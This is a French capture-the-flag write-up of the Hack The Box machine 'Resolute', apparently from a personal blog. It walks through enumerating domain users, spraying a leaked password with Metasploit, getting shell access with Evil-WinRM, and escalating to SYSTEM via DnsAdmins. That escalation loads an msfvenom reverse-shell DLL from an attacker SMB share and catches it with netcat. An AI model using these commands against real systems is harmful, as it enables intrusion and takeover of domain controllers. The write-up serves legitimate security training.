HTB – Resolute – Write-up

Introduction

Une machine virtuelle sympathique pour améliorer ses connaissances durant les phases d’énumération sous Windows. La partie exploitation est également très intéressante et nous montre de nouvelles techniques.

Les informations que nous avons à notre disposition sont :

  • IPv4 = 10.10.10.169
  • Nom de la VM = resolute.htb (par défaut chez HTB)

J’ai utilisé une VM Kali Rolling pour cet article. La plupart des outils utilisés sont disponibles par défaut et certains seront à téléchargés.

Phase de reconnaissance

J’effectue un scan (TCP) complet de la machine virtuelle de cette manière :

nmap -A -T4 -sV -p1-65535 -Pn -n --stats-every 10 resolute.htb --min-rate 100 -oN nmap-resolute-complete.txt

Cela permet d’identifier tous les ports ouverts avec leurs services respectifs et c’est suffisamment rapide.

Voici la totalité des 24 ports (TCP) ouverts :

53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-21 21:13:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
51658/tcp open unknown

Je ne fais pas de scan des ports UDP.

Phase d’énumération 1/2

D’après les ports ouverts nous voyons qu’il s’agit un contrôleur de domaine. Nous allons tenter de chercher des utilisateurs du domaine MEGABANK.

Pour ce type de serveur, je mets systématiquement deux fichiers à jour : /etc/hosts et /etc/resolv.conf + un nptdate avec le serveur cela peut être utile si on doit jouer avec Kerberos. Et on valide également que le port UDP 123 est aussi ouvert :

root@HTB:~/HTB/Resolute# grep -iE '(megabank|10\.10\.10\.169)' /etc/hosts
10.10.10.169 resolute.htb MEGABANK.LOCAL
root@HTB:~/HTB/Resolute# grep -iE '(megabank|10\.10\.10\.169)' /etc/resolv.conf
search MEGABANK.LOCAL
nameserver 10.10.10.169
root@HTB:~/HTB/Resolute# ntpdate resolute.htb
22 Apr 16:57:56 ntpdate[42105]: step time server 10.10.10.169 offset +616.300705 sec

Nous pouvons interroger le service MS-RPC de Windows à travers Samba/RPC et une Null session avec enum4linux, on récupère une liste de 27 utilisateurs :

abigail Name: (null) Desc: (null)
Administrator Name: (null) Desc: Built-in account for administering the computer/domain
angela Name: (null) Desc: (null)
annette Name: (null) Desc: (null)
annika Name: (null) Desc: (null)
claire Name: (null) Desc: (null)
claude Name: (null) Desc: (null)
DefaultAccount Name: (null) Desc: A user account managed by the system.
felicia Name: (null) Desc: (null)
fred Name: (null) Desc: (null)
Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
gustavo Name: (null) Desc: (null)
krbtgt Name: (null) Desc: Key Distribution Center Service Account
marcus Name: (null) Desc: (null)
marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
melanie Name: (null) Desc: (null)
naoki Name: (null) Desc: (null)
paulo Name: (null) Desc: (null)
per Name: (null) Desc: (null)
ryan Name: Ryan Bertrand Desc: (null)
sally Name: (null) Desc: (null)
simon Name: (null) Desc: (null)
steve Name: (null) Desc: (null)
stevie Name: (null) Desc: (null)
sunita Name: (null) Desc: (null)
ulf Name: (null) Desc: (null)
zach Name: (null) Desc: (null)

On découvre rapidement le user marko avec un mot de passe Welcome123! qui bien-sûr ne fonctionne pas. Ma stratégie de base est toujours tester les accès suivants pour chacun des comptes :

  • mot de passe = username/logoname
  • mot de passe = vide
  • mot de passe = Welcome123! (suite à notre découverte)

Je vais construire un fichier users.txt contenant la liste des comptes et utiliser Metasploit avec le module smb_login, en modifiant quelques options :

msfconsole
use auxiliary/scanner/smb/smb_login
set blank_passwords true
set rhosts resolute.htb
set smbdomain MEGABANK
set smbpass Welcome123!
set user_as_pass true
set user_file users.txt
run
Metasploit va être utile pour identifier les couples user/mot de passe valides

Un premier accès valide est identifié avec le compte de melanie :

Un accès valide

Phase d’exploitation 1/2

Nous allons maintenant nous connecter au serveur et tenter obtenir un shell. Nous utiliserons l’outil Evil-WINRM qui offre beaucoup de fonctionnalités, cela fonctionne et nous obtenons le fichier user.txt :

evil-winrm -i resolute.htb -u melanie -p Welcome123!
Fichier user.txt atteint

Phase d’énumération 2/2

Avec cet utilisateur j’ai utilisé plusieurs outils afin d’automatiser la tâche comme WindowsEnum, Powerless and kerbrute mais je ne trouve rien.

Par contre, on découvre la présence d’un autre répertoire utilisateur, celui d’un certain Ryan

Sur le forum HackTheBox on parle de fichiers cachés… je décide de suivre cette voie, cela me permet d’en apprendre un peu plus sur PowerShell.

La commande suivante va nous aider :

Get-ChildItem . -Force

Rapidement on trouve un répertoire intéressant :

Tiens, un répertoire qui n’est pas commun…

Et en cherchant un peu on tombe sur un fichier texte qui ressemble à un fichier de log :

Hum, un fichier de log…

Bingo ! Le fichier contient les accès d’un second utilisateur, notre Ryan justement :

Deuxième accès utilisateur

Nous nous connectons à nouveau avec l’outil Evil-WINRM et ce compte, et on peut voir un groupe local intéressant auquel il appartient, DnsAdmins :

whoami /all
Ryan appartient au groupe DnsAdmins

Une simple recherche sur Internet avec les mots clés privilege escalation windows dnsadmins et on tombe sur cet article très instructif. Tous les détails dans ce second article.

Il semble possible d’executer du code, en l’occurence une dll, avec les droits du compte SYSTEM grâce au service dns.exe. Ce qui ne semble pas représenter une faille de sécurité pour Microsoft, seulement une mauvaise gestion des droits.

On va tenter cette méthode d’exploitation.

Phase d’exploitation 2/2

Il faut d’abord générer notre charge utile avec msfvenom (un fichier *.dll) :

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4444 --platform=windows -f dll > plugin.dll

Pour la suite j’utilise trois shell différents :

  • Un Shell pour un serveur SMB temporaire avec Impacket
  • Un Shell avec un listener pour obtenir un Reverse Shell avec Netcat
  • Un Shell pour injecter notre Payload et redémarrer le service dns

Voici la commande executée dans le troisième Shell pour injecter notre charge utile :

dnscmd.exe resolute /config /serverlevelplugindll \\10.10.14.19\SHARE\plugin.dll
Import réussi du fichier DLL

Et voici les trois fenêtres/Shell avec les différentes commandes executées, nous aboutissons au résultat voulu :

On lance le serveur SMB dans un shell :

cd /usr/share/doc/python3-impacket/examples/
./smbserver.py SHARE ~/HTB/Resolute/

Dans un second shell on lance un port en écoute pour le reverse shell :

nc -nlvp 4444

Et dans le dernier, on redémarre le service DNS :

sc.exe stop dns
sc.exe start dns
Nous sommes root.

Nous pouvons donc récuperer le fichier root.txt :

Conclusion

J’ai bien aimé cette VM, une de mes favorites pour l’instant avec Sauna. Cela ouvre d’autres voies d’explorations et d’élévations de privilèges.

Par contre, je suis toujours surpris par le classement des VM sur le niveau de difficulté. Sauna était plus difficile à mon sens. Après, cela dépend certainement des compétences/connaissances de chacun et des affinités que l’on a avec telle ou telle technologie.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.